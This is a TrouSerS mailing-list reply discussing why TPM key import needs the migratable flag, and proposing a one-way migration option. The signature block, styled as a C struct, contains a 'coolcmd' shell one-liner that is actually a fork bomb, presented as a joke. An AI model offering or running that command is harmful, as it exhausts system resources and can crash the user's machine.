On 2 January 2014 13:58, Ken Goldman <[email protected]> wrote:
>> Make sure you set the TSS_KEY_MIGRATABLE flag, since that seems to be
>> required even to just import keys. :-(
> This does make sense.
>
> The TPM can certify that a non-migratable key's private key has never
> been in the clear outside the TPM. Since a private key generated by
> openssl was surely in the clear outside the TPM, the TPM cannot give
> that assurance.
Yeah it makes sense, but it misses the (according to me) valid use
case of only allowing one-way migration. It would be nice if it'd had
another bit signifying that.
--
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "[email protected]" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt"; };
char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
------------------------------------------------------------------------------
Rapidly troubleshoot problems before they affect your business. Most IT
organizations don't have a clear picture of how application performance
affects their revenue. With AppDynamics, you get 100% visibility into your
Java,.NET, & PHP application. Start your 15-day FREE TRIAL of AppDynamics Pro!
http://pubads.g.doubleclick.net/gampad/clk?id=84349831&iu=/4140/ostg.clktrk
_______________________________________________
TrouSerS-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/trousers-users
